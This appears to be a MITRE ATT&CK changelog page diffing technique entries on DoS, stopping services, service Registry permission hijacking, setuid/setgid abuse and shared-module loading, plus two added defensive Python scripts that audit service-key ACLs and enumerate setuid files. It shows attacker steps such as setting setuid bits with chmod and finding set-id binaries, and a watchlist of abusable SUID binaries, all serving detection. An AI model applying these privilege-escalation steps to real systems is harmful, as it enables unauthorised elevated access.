Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. 
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) |
| external_references[1]['source_name'] | capec | Arbor SSLDoS April 2012 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/488.html | https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new |
| external_references[2]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/489.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[3]['source_name'] | capec | Cloudflare HTTPflood |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/528.html | https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/ |
| external_references[5]['source_name'] | Cloudflare HTTPflood | capec |
| external_references[5]['url'] | https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/ | https://capec.mitre.org/data/definitions/488.html |
| external_references[6]['source_name'] | Arbor SSLDoS April 2012 | capec |
| external_references[6]['url'] | https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new | https://capec.mitre.org/data/definitions/489.html |
| external_references[7]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[7]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/528.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-02 22:11:32.017000+00:00 | 2022-07-28 18:47:11.957000+00:00 |
| external_references[1]['source_name'] | Talos Olympic Destroyer 2018 | SecureWorks WannaCry Analysis |
| external_references[1]['description'] | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html | https://www.secureworks.com/research/wcry-ransomware-analysis |
| external_references[2]['source_name'] | Novetta Blockbuster | Talos Olympic Destroyer 2018 |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. |
| external_references[2]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html |
| external_references[3]['source_name'] | SecureWorks WannaCry Analysis | Novetta Blockbuster |
| external_references[3]['description'] | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[3]['url'] | https://www.secureworks.com/research/wcry-ransomware-analysis | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Termination |
| x_mitre_data_sources[2] | Process: OS API Execution | Command: Command Execution |
| x_mitre_data_sources[3] | Service: Service Metadata | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Service: Service Metadata |
| x_mitre_data_sources[6] | Process: Process Termination | Process: OS API Execution |
| Description |
|---|
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll.(Citation: malware_hides_service) |
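The weakness described above is an ACL problem, so the practical check is to read each service key's DACL and look for write-class rights (KEY_SET_VALUE for ImagePath/ServiceDll/FailureCommand, KEY_CREATE_SUB_KEY for Performance/Parameters, plus WRITE_DAC/WRITE_OWNER and the generic write bits) granted to anything other than Administrators and SYSTEM. The Python below is an added example, not ATT&CK or Microsoft code: it parses the SDDL string that PowerShell returns for a key, for example `(Get-Acl 'HKLM:\SYSTEM\CurrentControlSet\Services\<name>').Sddl` (note that `sc sdshow` returns the service object's descriptor, not the Registry key's, so it is the wrong input here). The SAMPLE_SDDL is constructed for illustration and is not any real service's ACL; the trusted-principal list is an assumption to adjust per environment.

```python
# Added example (not from the ATT&CK entry): audit a service Registry key's DACL,
# given as SDDL, for write rights held by non-privileged principals.
# SAMPLE_SDDL is constructed; TRUSTED_DEFAULT is an assumption, not a standard.
import re

# SDDL access-right tokens as they apply to registry keys (KEY_* values from winnt.h).
RIGHTS = {
    "CC": 0x1,       # KEY_QUERY_VALUE
    "DC": 0x2,       # KEY_SET_VALUE
    "LC": 0x4,       # KEY_CREATE_SUB_KEY
    "SW": 0x8,       # KEY_ENUMERATE_SUB_KEYS
    "RP": 0x10,      # KEY_NOTIFY
    "WP": 0x20,      # KEY_CREATE_LINK
    "LO": 0x40, "CR": 0x80,
    "SD": 0x10000,   # DELETE
    "RC": 0x20000,   # READ_CONTROL
    "WD": 0x40000,   # WRITE_DAC
    "WO": 0x80000,   # WRITE_OWNER
    "KA": 0xF003F,   # KEY_ALL_ACCESS
    "KR": 0x20019,   # KEY_READ
    "KW": 0x20006,   # KEY_WRITE
    "KX": 0x20019,   # KEY_EXECUTE
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
}

# Rights that let a principal change what the service runs, or who controls the key.
WRITE_BITS = {
    0x2: "KEY_SET_VALUE",          # ImagePath, Parameters\ServiceDll, FailureCommand
    0x4: "KEY_CREATE_SUB_KEY",     # Performance, Parameters
    0x20: "KEY_CREATE_LINK",
    0x10000: "DELETE",
    0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER",
    0x10000000: "GENERIC_ALL",
    0x40000000: "GENERIC_WRITE",
}
WRITE_MASK = sum(WRITE_BITS)       # distinct single bits, so sum == bitwise OR

# Principals allowed to hold write rights on a service key (assumption).
TRUSTED_DEFAULT = ("BA", "SY", "CO", "S-1-5-18", "S-1-5-32-544")

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field):
    """Turn an SDDL rights field ('KR', 'CCDCLC', '0x20019') into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        tok = field[i:i + 2]
        if tok not in RIGHTS:
            raise ValueError(f"unknown SDDL right {tok!r}")
        mask |= RIGHTS[tok]
    return mask


def sddl_sections(sddl):
    """Split 'O:...G:...D:...S:...' into its sections, ignoring ':' inside ACEs."""
    sections, depth, key, start, i = {}, 0, None, 0, 0
    while i < len(sddl):
        c = sddl[i]
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        elif depth == 0 and c in "OGDS" and sddl[i + 1:i + 2] == ":":
            if key is not None:
                sections[key] = sddl[start:i]
            key, start = c, i + 2
            i += 2
            continue
        i += 1
    if key is not None:
        sections[key] = sddl[start:]
    return sections


def weak_aces(sddl, trusted=TRUSTED_DEFAULT):
    """Access-allowed ACEs granting write-class rights to principals outside `trusted`.

    Deny ACEs are not netted against allows, so the result may over-report but never
    hides a grant. Conditional/object ACE forms (more than six fields) are skipped.
    """
    findings = []
    for ace in ACE_RE.findall(sddl_sections(sddl).get("D", "")):
        parts = ace.split(";")
        if len(parts) != 6:
            continue
        ace_type, flags, rights, _obj, _inherit_obj, sid = parts
        if ace_type != "A":
            continue
        mask = parse_rights(rights)
        granted = mask & WRITE_MASK
        if sid not in trusted and granted:
            findings.append({
                "sid": sid, "flags": flags, "mask": hex(mask),
                "rights": [name for bit, name in WRITE_BITS.items() if granted & bit],
            })
    return findings


# Constructed ACL for a hypothetical service key: Administrators/SYSTEM full control,
# Users read-only, but Authenticated Users also holds KEY_CREATE_SUB_KEY (LC), which
# is enough to add a Performance or Parameters subkey.
SAMPLE_SDDL = ("O:BAG:SYD:PAI(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CIIO;KA;;;CO)"
               "(A;CI;KR;;;BU)(A;CI;0x20019;;;AU)(A;CI;LC;;;AU)(D;;KA;;;S-1-5-7)")
# The same key after the stray grant is removed (what a Set-Acl/icacls fix should yield).
FIXED_SDDL = SAMPLE_SDDL.replace("(A;CI;LC;;;AU)", "")

if __name__ == "__main__":
    for f in weak_aces(SAMPLE_SDDL):
        print(f)
```

Run it over every key under HKLM\SYSTEM\CurrentControlSet\Services and the output is the list of keys where a low-privileged account can redirect the service; the Performance-key case in the text corresponds to a finding whose rights include KEY_CREATE_SUB_KEY. The same pass also flags Parameters\ServiceDll and FailureCommand exposure, since those only need KEY_SET_VALUE on the key that holds them.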
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | @r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018. | |
| external_references | CAPEC-478 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-478 | |
| external_references | Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:52:52.058000+00:00 | 2022-05-05 04:53:45.640000+00:00 |
| external_references[1]['source_name'] | capec | Tweet Registry Perms Weakness |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/478.html | https://twitter.com/r0wdy_/status/936365549553991680 |
| external_references[2]['source_name'] | Registry Key Security | insecure_reg_perms |
| external_references[2]['description'] | Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. | Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN | https://itm4n.github.io/windows-registry-rpceptmapper-eop/ |
| external_references[3]['source_name'] | malware_hides_service | Kansa Service related collectors |
| external_references[3]['description'] | Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. | Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019. |
| external_references[3]['url'] | https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ | https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html |
| external_references[4]['source_name'] | Kansa Service related collectors | malware_hides_service |
| external_references[4]['description'] | Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019. | Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. |
| external_references[4]['url'] | https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html | https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ |
| external_references[5]['source_name'] | Tweet Registry Perms Weakness | Autoruns for Windows |
| external_references[5]['description'] | @r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018. | Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. |
| external_references[5]['url'] | https://twitter.com/r0wdy_/status/936365549553991680 | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns |
| external_references[6]['source_name'] | microsoft_services_registry_tree | Registry Key Security |
| external_references[6]['description'] | Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. | Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. |
| external_references[6]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree | https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN |
| external_references[7]['source_name'] | insecure_reg_perms | microsoft_services_registry_tree |
| external_references[7]['description'] | Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. | Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. |
| external_references[7]['url'] | https://itm4n.github.io/windows-registry-rpceptmapper-eop/ | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree |
| external_references[9]['source_name'] | Autoruns for Windows | capec |
| external_references[9]['url'] | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns | https://capec.mitre.org/data/definitions/478.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Service: Service Modification |
| x_mitre_data_sources[1] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[2] | Service: Service Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). |
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) |
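The find invocations in the new description are the attacker's discovery step, and the defender's hunt is the same enumeration plus triage. One caveat for practitioners: `-perm +4000` is the BSD/macOS form; GNU find has rejected the `+mode` syntax for years, so on Linux use `find / -xdev -type f -perm -4000` (or `-perm /4000`) instead. The Python below is an added example, not ATT&CK or GTFOBins code, that performs the equivalent walk without following symlinks or crossing filesystems and then triages the results; the WATCHLIST is a short illustrative subset of binaries GTFOBins lists under SUID, the STANDARD_DIRS tuple is an assumption about where a distribution's own set-id binaries live, and the demo tree it builds is constructed test data that needs no privileges.

```python
# Added example (not from the ATT&CK entry): enumerate setuid/setgid files under a
# root and triage them. WATCHLIST is an illustrative subset of the GTFOBins SUID list,
# STANDARD_DIRS is an assumption, and build_constructed_tree() makes test data only.
import os
import stat
import tempfile

WATCHLIST = {"bash", "sh", "env", "find", "vim", "vi", "less", "more", "awk",
             "python3", "perl", "nmap", "cp", "mv", "tee"}
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def setid_flags(mode):
    """Names of the set-id bits present in a st_mode value."""
    return [name for bit, name in ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid"))
            if mode & bit]


def _same_device(path, dev):
    try:
        return os.lstat(path).st_dev == dev
    except OSError:
        return False


def find_setid_binaries(root, one_filesystem=True):
    r"""Regular files under `root` with setuid and/or setgid set.
    Rough GNU find equivalent: find ROOT -xdev -type f \( -perm -4000 -o -perm -2000 \)"""
    results = []
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        if one_filesystem:
            # prune mount points so the scan stays out of /proc, network mounts, etc.
            dirnames[:] = [d for d in dirnames if _same_device(os.path.join(dirpath, d), root_dev)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            flags = setid_flags(st.st_mode)
            if flags:
                results.append({
                    "path": path,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "uid": st.st_uid,
                    "gid": st.st_gid,
                    "flags": flags,
                    "world_writable": bool(st.st_mode & stat.S_IWOTH),
                    "on_watchlist": name in WATCHLIST,
                })
    return results


def triage(records):
    """Attach review reasons; records with no reason are routine system binaries
    better handled by diffing against a baseline than by hand."""
    out = []
    for r in records:
        reasons = []
        if r["on_watchlist"]:
            reasons.append("watchlist binary with setuid")
        if r["world_writable"]:
            reasons.append("world-writable setuid file")
        if not r["path"].startswith(STANDARD_DIRS):
            reasons.append("outside standard system directories")
        if reasons:
            out.append({**r, "reasons": reasons})
    return out


def build_constructed_tree():
    """Constructed demo tree: a setuid file named like a watchlist entry plus a
    benign file. Returns (root, setuid_path). Needs no privileges."""
    root = tempfile.mkdtemp(prefix="setid_demo_")
    suspicious = os.path.join(root, "find")
    benign = os.path.join(root, "readme.txt")
    for p in (suspicious, benign):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
    os.chmod(suspicious, 0o4755)   # same effect as: chmod 4755 find  (or chmod u+s on a 755 file)
    os.chmod(benign, 0o644)
    return root, suspicious


if __name__ == "__main__":
    demo_root, _ = build_constructed_tree()
    for rec in triage(find_setid_binaries(demo_root)):
        print(rec["path"], rec["mode"], rec["flags"], rec["reasons"])
```

Running `find_setid_binaries("/")` on a host and storing the result gives a baseline; a later run that adds an entry, or an entry whose mode, owner or hash changed, is the File Modification event the technique's data sources refer to, and the triage reasons tell you which of those to look at first.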
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 00:43:58.149000+00:00 | 2022-04-19 15:07:53.060000+00:00 |
| description | An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). |
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setgid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) |
| external_references[1]['source_name'] | setuid man page | GTFOBins Suid |
| external_references[1]['description'] | Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018. | Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022. |
| external_references[1]['url'] | http://man7.org/linux/man-pages/man2/setuid.2.html | https://gtfobins.github.io/#+suid |
| x_mitre_data_sources[0] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'setuid man page', 'description': "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", 'url': 'http://man7.org/linux/man-pages/man2/setuid.2.html'} |
| Old Description | New Description |
|---|---|
Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via `<file name="filename.extension" loadFrom="fully-qualified or relative pathname">` in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute shared modules to load additional components or features. | Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)<br>The module loader can load DLLs:<br>* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;<br>* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);<br>* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;<br>* via `<file name="filename.extension" loadFrom="fully-qualified or relative pathname">` in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.<br>Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute shared modules to load additional components or features. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_remote_support | False | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 13:48:02.963000+00:00 | 2022-04-19 20:31:10.657000+00:00 |
| description | Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)<br>The module loader can load DLLs:<br>* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;<br>* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);<br>* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;<br>* via `<file name="filename.extension" loadFrom="fully-qualified or relative pathname">` in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.<br>Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute shared modules to load additional components or features. | Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)<br>The module loader can load DLLs:<br>* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;<br>* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);<br>* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;<br>* via `<file 